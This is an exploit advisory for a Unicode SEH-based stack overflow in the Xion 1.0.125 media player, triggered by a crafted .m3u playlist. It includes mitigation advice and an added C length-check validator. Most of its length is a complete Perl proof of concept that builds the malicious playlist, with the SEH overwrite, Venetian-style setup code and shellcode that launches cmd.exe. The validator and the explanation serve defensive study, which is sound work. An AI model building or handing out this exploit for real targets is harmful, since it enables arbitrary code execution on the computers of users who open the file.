Vendor: Xion
Author: James Anderson (synthetic)
CVSS: 7.5 (HIGH)
Vulnerability type: Execute Code, Overflow UTF-16LE buffer, Memory corruption
Product Name: Xion
Affected Version From: Xion 1.0.125
Affected Version To: Xion 1.0.125
Patch Exists: NO
Platforms Tested: Windows XP SP3
Year: 2018

Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit

The vulnerability is a stack-based buffer overflow in the way Xion 1.0.125 processes entries of a .m3u playlist file: an overlong entry is never checked against the size of the destination buffer, so it overwrites the SEH (Structured Exception Handler) frame and hands the attacker control of the program's execution flow. Because the file contents are expanded to UTF-16LE before they reach the vulnerable buffer, every attacker-supplied byte is followed by a 0x00 byte; the exploit therefore uses the "Venetian" technique from Chris Anley's paper on Unicode-expanded strings to build working code out of such 00-interleaved data. The exploit header notes that the binary was built without /SAFESEH, /GS, DEP or ASLR and that SEHOP was not active, which is why a plain SEH overwrite is enough. The outcome is arbitrary code execution with the privileges of the user who opens the playlist, or a denial of service (crash).

Mitigation:

No patch is listed for this version (see "Patch Exists" above), so the practical mitigation is to update Xion if a newer release is available and, until then, not to open .m3u playlists from untrusted sources with it. The exploit header notes that the binary ships without /SAFESEH, /GS, DEP or ASLR and that SEHOP was not active; enabling DEP and SEHOP system-wide on hosts whose operating system supports them makes this style of SEH overwrite considerably harder. On the vendor side the root cause is a missing length check: the parser should validate the length of each playlist entry against the destination buffer before copying, reject rather than truncate oversized input, and the binary should be built with the stack and exception-handler protections listed above.
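As an added example (not part of the advisory, the Exploit-DB entry or the Xion code base), the following C validator shows the check the vulnerable parser lacks: each playlist entry is measured against a fixed limit before it is copied into a fixed-size destination buffer, and oversized or control-character entries are rejected outright instead of being truncated. The 260-byte limit, the function names and the sample playlist are assumptions made for this example; the sample's 300-byte run of 'A' mimics the oversized entry the proof of concept writes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Longest playlist entry accepted. The limit is an assumption for this
 * example: it matches the 260-byte prefix the proof of concept uses to reach
 * the SEH frame, so an entry that long is refused before any copy happens. */
#define MAX_ENTRY_LEN 260
#define ENTRY_BUF_SIZE (MAX_ENTRY_LEN + 1)

enum entry_status { ENTRY_OK = 0, ENTRY_EMPTY, ENTRY_TOO_LONG, ENTRY_BAD_BYTE };

/* Validate one playlist line and copy it into a fixed-size buffer only when
 * it fits. The length check precedes the copy, which is exactly what the
 * vulnerable parser omits. On failure dst is left as an empty string. */
enum entry_status validate_entry(const char *line, size_t line_len,
                                 char dst[ENTRY_BUF_SIZE])
{
    size_t i;
    dst[0] = '\0';
    while (line_len > 0 &&
           (line[line_len - 1] == '\n' || line[line_len - 1] == '\r'))
        line_len--;                     /* drop the line terminator */
    if (line_len == 0)
        return ENTRY_EMPTY;
    if (line_len > MAX_ENTRY_LEN)
        return ENTRY_TOO_LONG;          /* would overflow: reject, never truncate */
    for (i = 0; i < line_len; i++) {
        unsigned char c = (unsigned char)line[i];
        if (c < 0x20 || c == 0x7f)      /* control bytes never belong in a path */
            return ENTRY_BAD_BYTE;
    }
    memcpy(dst, line, line_len);
    dst[line_len] = '\0';
    return ENTRY_OK;
}

/* Convenience wrapper for a single NUL-terminated line. */
enum entry_status check_line(const char *line)
{
    char dst[ENTRY_BUF_SIZE];
    return validate_entry(line, strlen(line), dst);
}

/* Walk an in-memory playlist. Lines starting with '#' are directives
 * (#EXTM3U, #EXTINF) and are skipped. Returns the number of rejected
 * entries and stores the number accepted in *accepted. */
int scan_playlist(const char *data, size_t len, int *accepted)
{
    int rejected = 0;
    char entry[ENTRY_BUF_SIZE];
    size_t start = 0;
    *accepted = 0;
    while (start < len) {
        size_t end = start;
        while (end < len && data[end] != '\n')
            end++;
        if (end > start && data[start] != '#') {
            enum entry_status st = validate_entry(data + start, end - start, entry);
            if (st == ENTRY_OK)
                (*accepted)++;
            else if (st != ENTRY_EMPTY)
                rejected++;             /* a real entry that failed validation */
        }
        start = end + 1;
    }
    return rejected;
}

/* Constructed sample playlist: a directive, one normal entry, and a 300-byte
 * run of 'A' that mimics the oversized entry the proof of concept writes. */
size_t build_sample(char *out, size_t cap)
{
    const char *head = "#EXTM3U\r\nmusic/track01.mp3\r\n";
    size_t n = strlen(head);
    if (cap < n + 300 + 2)
        return 0;
    memcpy(out, head, n);
    memset(out + n, 'A', 300);
    n += 300;
    out[n++] = '\r';
    out[n++] = '\n';
    return n;
}

int sample_accepted(void)
{
    char buf[512];
    int accepted;
    scan_playlist(buf, build_sample(buf, sizeof buf), &accepted);
    return accepted;                    /* 1: only music/track01.mp3 passes */
}

int sample_rejected(void)
{
    char buf[512];
    int accepted;
    return scan_playlist(buf, build_sample(buf, sizeof buf), &accepted); /* 1 */
}

int main(void)
{
    printf("accepted=%d rejected=%d\n", sample_accepted(), sample_rejected());
    return 0;
}
```

Rejecting rather than truncating is deliberate: a silently shortened path would still be "valid" to the rest of the program and hide the fact that hostile input was seen, whereas a rejection can be logged and surfaced to the user.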

Exploit-DB raw data:

#!/usr/bin/perl
# ########################################################################
# Title:                Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type:   Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date:                 Feb 18, 2018
# Author:               James Anderson (synthetic)
# Original Advisory:    http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation:   There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About:                The technique is taken from the paper "Creating Arbitrary Shellcode In Unicode Expanded Strings" by Chris Anley
# Tested on:            Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
#                   _   _          _   _      
#   ___ _   _ _ __ | |_| |__   ___| |_(_) ___ 
#  / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
#  \__ \ |_| | | | | |_| | | |  __/ |_| | (__ 
#  |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
#	|___/                                         
#
# ########################################################################
                                          
 my $path = "/media/s4/DragonR.m3u";

 my $buffer_length = 5000;
 my $suboffset = 0x104;
 my $NOP1 = "\x6F"; # add [edi], ch
 my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx

 # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
 my $crash = "A" x 260;
 # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
 $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH: popad leaves an address close to the buffer in EAX
 $crash .= "\x79\x41"; # pop r32 # pop r32 # ret; SEH handler address, usable because there is no /SAFESEH, SEHOP, DEP or ASLR

 my $offset_to_payload = length($crash);

 # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ setup code: patch the bad bytes of the shellcode in place before it runs
	# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
 	$crash .= $NOP1; # NOP-eq
 	$crash .= "\x6a\x59"; # push 0 # pop ecx
	$crash .= $NOP1; # NOP-eq
 	$crash .= "\x41"; # inc ecx
	$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
	$crash .= $NOP1; # NOP-eq
	$crash .= "\x41"; # inc ecx
	$crash .= "\xC8"; # add al, cl
	$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;

	# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character 
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
	$crash .= "\x30"; # add [eax],dh		 
	$crash .= $NOP1; # NOP-eq

	# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
	$crash .= "\x40"; # inc eax
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
	$crash .= "\x30"; # add [eax],dh		

	# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x45\x41"; # mov edx, 41004500 
	$crash .= "\x30"; # add [eax],dh
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x46\x41"; # mov edx, 41004600 
	$crash .= "\x30"; # add [eax],dh

	# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x68\x41"; # mov edx, 41006800 
	$crash .= "\x30"; # add [eax],dh 

	# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x78\x41"; # mov edx, 41007800 
	$crash .= "\x30"; # add [eax],dh 

	# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x2F\x41"; # mov edx, 41002F00 
	$crash .= "\x30"; # add [eax],dh 

	# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x63\x41"; # mov edx, 41006300 
	$crash .= "\x30"; # add [eax],dh 

	# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x64\x41"; # mov edx, 41006400 
	$crash .= "\x30"; # add [eax],dh 

	# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x8d\x41"; # mov edx, 41008d00 
	$crash .= "\x30"; # add [eax],dh 

	# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xf8\x41"; # mov edx, 4100f800 
	$crash .= "\x30"; # add [eax],dh

	# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xb8\x41"; # mov edx, 4100b800 
	$crash .= "\x30"; # add [eax],dh

	# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x49\x41"; # mov edx, 41004900 
	$crash .= "\x30"; # add [eax],dh
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x4A\x41"; # mov edx, 41004A00 
	$crash .= "\x30"; # add [eax],dh

	# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x77\x41"; # mov edx, 41007700 
	$crash .= "\x30"; # add [eax],dh

	# [2.14] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xd0\x41"; # mov edx, 4100d000 
	$crash .= "\x30"; # add [eax],dh

 # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe) 
	 						 # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
 $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
 $crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)


 # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. Left column: the bytes actually written to the file; right column (commented out): the shellcode those bytes become once the setup code in [2] has patched the bad bytes and the 00 bytes inserted by the UTF-16 expansion ("# 0" marks an inserted 00). CMD=cmd.exe
my $shellcode =
"\x50".	# "\x8b". #	# BAD BYTE
	# "\xec". # 0
"\x55".	# "\x55".
	# "\x8b". # 0	# BAD BYTE  
"\xec".	# "\xec".
	# "\x68". # 0
"\x65".	# "\x65".
	# "\x78". # 0
"\x65".	# "\x65".
	# "\x2F". # 0
"\x68".	# "\x68".
	# "\x63". # 0
"\x6d".	# "\x6d".
	# "\x64". # 0
"\x2e".	# "\x2e".
	# "\x8d". # 0
"\x45".	# "\x45".
	# "\xf8". # 0
"\x50".	# "\x50".
	# "\xb8". # 0
"\xc7".	# "\xc7".
	# "\x93". # 0	# BAD BYTE  
"\xc2".	# "\xc2".
	# "\x77". # 0
"\xff";	# "\xff".
	# "\xd0"; # 0

 $crash .= $shellcode;

 $crash .= "C" x ($buffer_length - length($crash));
 open(myfile, ">$path") or die "Cannot write $path: $!";
 binmode(myfile); # write the bytes exactly as built
 print myfile $crash;
 close(myfile);